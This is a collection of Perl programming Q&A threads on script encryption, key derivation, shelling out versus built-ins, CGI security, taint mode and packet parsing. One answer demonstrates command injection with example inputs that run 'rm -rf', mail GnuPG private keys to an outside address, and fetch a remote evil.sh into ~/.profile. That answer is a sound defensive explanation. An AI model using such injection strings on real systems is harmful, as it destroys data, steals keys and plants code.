Using Filter::Crypto (crypt_file) encrypted Perl scripts on other machines - perl

I'm trying to use the Filter::Crypto module, but I'm struggling with it a bit. I would like to encrypt a script
crypt_file script.pl > encrypted_script.pl
and then use that encrypted script on another machine.
When I use
pp -f Crypto -M Filter::Crypto::Decrypt -o encrypted_script encrypted_script.pl
the created binary works fine - it contains the key for decryption. But I want to use just the encrypted_script.pl file. I would like to provide a fully functional encrypted Perl script that nobody would be able to decrypt (easily). Is that even possible?

You're talking about digital rights management, although you may not know it.
Encrypting something so it's really hard to read is relatively easy. Doing so while still allowing someone to read it, but only when you say so, is really difficult (as in, basically impossible without control over the target infrastructure, at which point it's largely academic anyway).
That goes double when you're using an interpreted language like Perl, because any obfuscation has to be undone before the code can run.
The module's documentation explains some of this, and it has some mechanisms to make recovery slightly harder, but at a pretty fundamental level it's impossible to do exhaustively.
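To make that concrete, here is a toy source filter built on the core Filter::Util::Call module (a sketch; Filter::Crypto::Decrypt does the same job in XS with a real cipher and an embedded key). The "decryption" here is just ROT13, but the structural point holds for any cipher: the filter must hand the interpreter the decrypted source, so anyone who can run the script can, in principle, recover it.

package Demo::Rot13Filter;
use strict;
use warnings;
use Filter::Util::Call;

sub import {
    my ($class) = @_;
    filter_add(bless {}, $class);
}

sub filter {
    my ($self) = @_;
    my $status = filter_read();               # pull one line of "ciphertext" into $_
    tr/A-Za-z/N-ZA-Mn-za-m/ if $status > 0;   # "decrypt" it in place
    # $_ now holds plaintext Perl source. Whatever the cipher, the
    # interpreter must see the decrypted code at this point, which is
    # why anyone who can run the script can also dump its source.
    return $status;
}

1;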

Is there a perl OpenSSL EVP Key Derivation Function with MD5 support?

Background
Yahoo Finance recently (Nov-2022?) started encrypting the data returned by queries such as: curl --silent --output - https://finance.yahoo.com/quote/t.
I found some Python code that will decode this in https://github.com/ranaroussi/yfinance/blob/main/yfinance/data.py#L49
Since Python is an Algol-like language, I was hoping it would be a quick port.
Here is where I hit a snag: https://github.com/ranaroussi/yfinance/blob/main/yfinance/data.py#L82
I was hoping for some relief from an existing perl module, such as Crypt::OpenSSL::FASTPBKDF2.
I know just enough about cryptography to hurt myself.
My question(s):
Is there a straightforward port for the Python function EVPKDF? It seems so close, except for the hashAlgorithm="md5" portion of EVPKDF(password, salt, keySize=32, ivSize=16, iterations=1, hashAlgorithm="md5").
The Crypt::OpenSSL::FASTPBKDF2 module doesn't seem to support md5. I know that md5 was defeated over a decade ago, but it seems to be what Yahoo is dishing out, based on the Python code.
Any thoughts are welcome.
My goal is to get the data, and I am not above using a system("openssl kdf..."); call. Not this time, anyway.
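For what it's worth: with iterations=1 and MD5, the Python EVPKDF above is just OpenSSL's classic EVP_BytesToKey derivation, which is short enough to write directly against Digest::MD5. A minimal sketch (untested against Yahoo's current payloads; the key/IV sizes come from the Python call, and the password/salt values are placeholders):

use strict;
use warnings;
use Digest::MD5 qw(md5);

# EVP_BytesToKey with MD5 and count=1:
#   D_1 = MD5(password . salt); D_i = MD5(D_{i-1} . password . salt)
# Concatenate the D_i until there are enough bytes for the key and IV.
sub evp_bytes_to_key {
    my ($password, $salt, $key_len, $iv_len) = @_;
    my ($bytes, $d) = ('', '');
    while (length($bytes) < $key_len + $iv_len) {
        $d      = md5($d . $password . $salt);
        $bytes .= $d;
    }
    return (substr($bytes, 0, $key_len), substr($bytes, $key_len, $iv_len));
}

my ($key, $iv) = evp_bytes_to_key('secret', "\x01\x02\x03\x04\x05\x06\x07\x08", 32, 16);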

Using system commands in Perl instead of built-in libraries/functions [duplicate]

On occasion I see people calling the system grep from Perl (and other scripting languages, for that matter) instead of using the built-in language facilities/libraries to parse files. I would like to encourage people to use the built-in facilities, and I want to solicit some reasons why that is good practice. I can think of a few, such as:
Using libraries/language facilities is faster. Performance suffers due to the overhead of executing external commands.
Sticking to language facilities is more portable.
Any other reasons?
On the other side of the coin, are there ever reasons to favour using system commands instead of the built-in language facilities? On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?
Actually, when it matters, a specialized tool can be faster.
The real gains of keeping the work in Perl are:
Portability (even between machines with the same OS).
Ease of error detection (see the sketch after this list).
Flexibility in handling of errors.
Greater customizability/flexibility.
Fewer "moving parts". (Are you sure you escaped everything properly and set up the environment correctly?)
Less expertise needed. (You don't need to know both Perl and the external tools (and their ports) to code and maintain the program.)
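To illustrate the error-detection point, a small sketch (the file name and pattern are made up). With the external grep you get one lumped exit status; in pure Perl each failure mode is distinct and carries $!:

use strict;
use warnings;

# External tool: a nonzero $? could mean "no match", "no such file",
# "grep not installed"... and stderr went somewhere else entirely.
my @matches = `grep -- needle haystack.txt`;
warn "grep failed with status $?, but why?" if $?;

# Pure Perl: each failure is reported separately, with the OS error.
open(my $fh, '<', 'haystack.txt')
    or die "Cannot open haystack.txt: $!";
my @same = grep { /needle/ } <$fh>;
close($fh);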
On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?
Possibly. You can configure some shells to exit if any program returns an unsuccessful error code. This can make some scripts quite robust. For example, I have a couple of bash scripts featuring the line
trap 'e=$? ; echo "Error." ; exit $e' ERR
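A rough Perl analogue is a tiny wrapper that dies whenever a command fails (a sketch; the tar invocation is just an example):

use strict;
use warnings;

sub run {
    my @cmd = @_;
    system(@cmd) == 0
        or die "Command '@cmd' failed: \$? = $?\n";
}

run('tar', '-czf', 'backup.tgz', 'data/');   # dies here if tar fails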
"On the other side of the coin, are there ever reasons to favour using system commands instead of the built-in language facilities? On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?"
Risking the wrath of Perl hardliners here. But for me there is an easy reason to use system grep instead of perl grep: I know its syntax.
Same reason to use a Perl script instead of a bash script: I know how to do stuff in Perl and never bothered with bash script syntax.
And as we are talking scripts here, my main concern is getting it done fast, reliably (and readably). At work I do not have to bother with portability, as all production is done on the very same system, down to the same software versions of everything for the whole product lifespan.
At home I do not have to care about lifetime or whatever either, as the script is most likely single-purpose.
And in neither case do I care about performance or software security, as I would be using C++ or something else for commercial software or in time- or memory-limited scenarios.
Edit: I'm not saying these reasons apply to everyone, or even to anyone else. But while in reality I know how to use Perl's grep, I really have no idea how to write a bash script and most likely never will. Just putting down a few lines of Perl is always faster for me.
Using external tools leads to more errors.
Moreover, you have to parse the results (if any) of the external command, which is another source of error.
Needless to say, it is also bad in terms of security.

Is running a C/C++ CGI script on Apache dangerous?

I am currently programming my own little website system (a script that compiles Markdown documents, and puts them in appropriate locations, thus making a quick, static website).
I would like to enable people who go to my (initially static) contact page, to send me a GnuPG-encrypted message.
Basically, the visitor writes his or her message in a contact form, clicks this checkbox if they want the message to be encrypted, and upon receiving the form, a C(?) program of mine calls system("gpg --encrypt --recipient 31A49121CD42FF00 --armor <the_message>");
(I have yet to determine how to effectively get the message contents and use it in a command without writing the unencrypted message to disk).
Is it (un)secure to use exec() in a self-made C program that processes form data? Is there a simpler way to achieve what I want to do (using a standalone script—because my website is static—to run GPG)? Any security considerations I haven’t thought about?
I am asking on here instead of Security SE because I am looking for answers with developers’ points of view.
As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer, I can give you a few different thoughts.
When you are considering security of processes executing on your target, you have to consider a number of things and how someone may abuse the situation.
A glimpse
Let's look at the immediate security problem that I see just offhand: you are using the system() call directly on <the_message>. Can you imagine the following:
the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are the private keys' temporary_account#hotmail.com" or worse;
the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
So the first thing to do is to never use anything provided by a user as a command or as part of a command line; save the message to a temporary text file and encrypt that, or better, pass it to gpg on stdin, as sketched below.
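A sketch of one way to do that in Perl (which the next section recommends over C anyway): hand the message to gpg on stdin through a list-form pipe open, so no shell ever sees it and the plaintext never touches disk, which the asker wanted to avoid. The form-field name and output file are made up:

use strict;
use warnings;
use CGI;

my $q       = CGI->new;
my $message = $q->param('message') // '';

# List-form pipe open: the arguments go straight to the new process, so
# nothing in $message can be interpreted as shell syntax.
open(my $gpg, '|-', 'gpg', '--encrypt', '--recipient', '31A49121CD42FF00',
                    '--armor', '--output', 'message.asc')
    or die "Cannot start gpg: $!";
print {$gpg} $message;
close($gpg) or warn "gpg exited with status $?";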
A slightly deeper look
Okay, so what's going on in terms of using C? Before I give you the answer, I would like to say I love C; I almost exclusively program in C and have been a professional developer with a main focus on C for the last 24 years. Now, I would also say that C is a horrid tool for writing a CGI program, and you should only do it if you have a truly compelling reason. And after you find that reason, you should discard it anyway and abandon the thought.
Here are some reasons why you SHOULDN'T use C for a CGI interface.
CGI/1.1 is an ugly standard; it uses environment variables, stdin, and all sorts of character remapping and recoding just to get data across. You are invariably going to have to deal with either implementing a CGI interface yourself or using libcgi or some equivalent library in order to deal with all the permutations, and at the end you'll just hate yourself for it.
When I used http://libcgi.sourceforge.net for a particular project, I had to debug, harden, and augment it because it had some horrible buffer overflow issues left, right, and center, non-existent UTF-8 support, and limited control over authentication.
But even if you have that covered, C is generally a bad idea because a lot of the security issues arise out of the manual manipulation of memory that one has to do.
A higher-level language (shell script, awk, Perl, PHP, etc.) is a much better tool for handling CGI; Perl was almost built for it, and PHP was specifically built for it. Another advantage of using Perl or PHP in your situation is that GnuPG modules are available, so you don't have to system() anything.
The key to good development is to use the easiest, most straightforward toolkit for the job. In your case I think you should NOT use C, as it would force you to do things that are already very well done for you in the form of a proper CGI-processing language such as PHP.
Those are my thoughts; I hope that you will find them useful.

Executing system commands safely while coding in Perl

Should one really use external commands while coding in Perl? I see several disadvantages to it: it's not system-independent, and there may be security risks as well. What do you think? If there is no way around it and you have to use shell commands from Perl, then what is the safest way to execute that particular command (like checking the PID, UID, etc.)?
It depends on how hard it is going to be to replicate the functionality in Perl. If I needed to run the m4 macro processor on something, I'd not think of trying to replicate that functionality in Perl myself, and since there's no module on http://search.cpan.org/ that looks suitable, it would appear others agree with me. In that case, then, using the external program is sensible. On the other hand, if I needed to read the contents of a directory, then the combination of readdir() et al plus stat() or lstat() inside Perl is more sensible than futzing with the output of ls.
If you need to execute commands, think very carefully about how you invoke them. In particular, you probably want to avoid the shell interpreting the arguments, so use the array form of system (see also exec), etc, rather than a single string for the command plus arguments (which means the shell is used to process the command line).
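A minimal contrast (the pattern and file name are placeholders):

use strict;
use warnings;

my ($pattern, $file) = ('needle', 'some file.txt');

# Single string: the shell parses it, so the space in the file name (or
# quotes, ';', '$(...)' in either variable) changes the command entirely.
system("grep $pattern $file");

# List form: no shell involved; each argument is passed verbatim.
system('grep', '--', $pattern, $file);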
Executing external commands can be expensive simply because it involves forking a new process and watching its output if you need it.
Probably more importantly, should the external process fail for any reason, it may be difficult for your script to understand what happened. Worse still, surprisingly often an external process can get stuck forever, and then so will your script. You can use special tricks like opening a pipe and watching for output in a loop (sketched below), but this is itself error-prone.
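One such trick, sketched here with a made-up command name, is an alarm()-based timeout around a pipe open:

use strict;
use warnings;

my @lines;
eval {
    local $SIG{ALRM} = sub { die "timeout\n" };
    alarm 10;                                # give the command 10 seconds
    open(my $fh, '-|', 'some_slow_command')  # list-form pipe open, no shell
        or die "Cannot run some_slow_command: $!";
    @lines = <$fh>;
    close($fh);
    alarm 0;
};
die "Child did not finish in time\n" if $@ && $@ eq "timeout\n";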
Perl is very capable of doing many things. So, if you stick to using only Perl's native constructs and modules to accomplish your tasks, not only will it be faster because you never fork, but it will also be more reliable, and errors will be easier to catch by looking at the native Perl objects and structures returned by library routines. And of course, it will be automatically portable to different platforms.
If your script runs with elevated permissions (like root or under sudo), you should be very careful about what external programs you execute. One simple way to ensure basic security is to always specify commands by full path, like /usr/bin/grep (but still think twice, and just do the grep in Perl itself!). However, even this may not be enough if an attacker is using the LD_PRELOAD mechanism to inject rogue shared libraries.
If you are willing to go very secure, consider enabling taint checking with the -T flag, like this:
#!/usr/bin/perl -T
The taint flag will also be enabled automatically by Perl if your script is determined to have different real and effective user or group IDs.
Taint mode will severely limit your ability to do many things (like calling system()) without Perl complaining - see more at http://perldoc.perl.org/perlsec.html#Taint-mode - but it will give you much higher confidence in your security.
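A minimal taint-mode sketch (the grep invocation is just an example): anything derived from outside input is tainted, and must be explicitly untainted through a regex capture before it may reach system() and friends.

#!/usr/bin/perl -T
use strict;
use warnings;

# Taint mode refuses to run external commands with an unsanitized PATH.
$ENV{PATH} = '/usr/bin:/bin';

my $file = $ARGV[0] // '';

# Untaint by capturing against a conservative whitelist of characters.
($file) = $file =~ /\A([\w.\/-]+)\z/
    or die "Unsafe file name\n";

system('/usr/bin/grep', '--', 'pattern', $file) == 0
    or die "grep failed: status $?\n";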
Should one really use external commands while coding in Perl?
There's no single answer to this question. It all depends on what you are doing within the wide range of potential uses of Perl.
Are you using Perl as a glorified shell script on your local machine, or just trying to find a quick-and-dirty solution to your problem? In that case, it makes a lot of sense to run system commands if that is the easiest way to accomplish your task. Security and speed are not that important; what matters is the ability to code quickly.
On the other hand, are you writing a production program? In that case, you want secure, portable, efficient code. It is often preferable to write the functionality in Perl (or use a module), rather than calling an external program. At least, you should think hard about the benefits and drawbacks.

Perl network frame/packet parser

I am writing a small sniffer as part of a personal project. I am using Net::Pcap (really really great tool).
In the packet-processing loop I am using the excellent Net::Frame for unpacking all the headers and getting at the data. I am getting concerned that this might not be terribly efficient (Net::Frame is great but seems to be more than I need for this project).
Also, I dislike that on some Debian systems I had to manually compile libdumbnet (the package provided in the official apt repositories didn't seem to work; Net-Libdnet-0.92 didn't like it).
All I want is to get at the payload inside a TCP segment. Is there any alternative?
Thank you.
P.S. Would it be really, really bad (read: "thedailywtf.com-worthy") if I just took the packet and searched it for some pattern?
I recently wrote a PCAP dump file unpacker in C and then afterwards wished I'd just used the open source libraries instead (when I realised they existed and were so easy to use). I have to say that as it's a binary file format it's probably easier to do in C than Perl, but I'll no doubt get booed by all the Perl fanatics out there.
What I will say is that using existing code will be quicker all round than coding it yourself, but if you really really want to, the file format is freely available online and is really quite simple.
As for searching for a pattern, it almost certainly won't work. It's a binary file format and the packets can be fragmented and/or duplicated, so the only reliable way to know where a message starts and ends is by unpacking the headers, checking the packet flags, reading the content length field, etc. etc. Doing pattern searches may work 90% of the time, but at some point you'll find a packet capture log that means you need to change your code. And then a while later find another packet that means another change, and so on and so forth.
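That said, if the capture really is simple (untagged Ethernet, IPv4, no reassembly needed), a hedged sketch of getting at a TCP payload with plain unpack() looks like the following; every corner case beyond these assumptions is exactly what Net::Frame handles for you:

use strict;
use warnings;

# Returns the TCP payload of one captured frame, or undef if the frame
# is not IPv4/TCP. Assumes an untagged Ethernet link layer.
sub tcp_payload {
    my ($frame) = @_;

    my $ether_type = unpack('x12 n', $frame);        # bytes 12-13: EtherType
    return unless $ether_type == 0x0800;             # IPv4 only

    my $ip  = substr($frame, 14);                    # skip 14-byte Ethernet header
    my $ihl = (unpack('C', $ip) & 0x0F) * 4;         # IP header length in bytes
    return unless unpack('x9 C', $ip) == 6;          # protocol 6 = TCP

    my $tcp      = substr($ip, $ihl);
    my $data_off = (unpack('x12 C', $tcp) >> 4) * 4; # TCP header length in bytes
    return substr($tcp, $data_off);                  # note: may carry Ethernet
                                                     # padding on very short frames
}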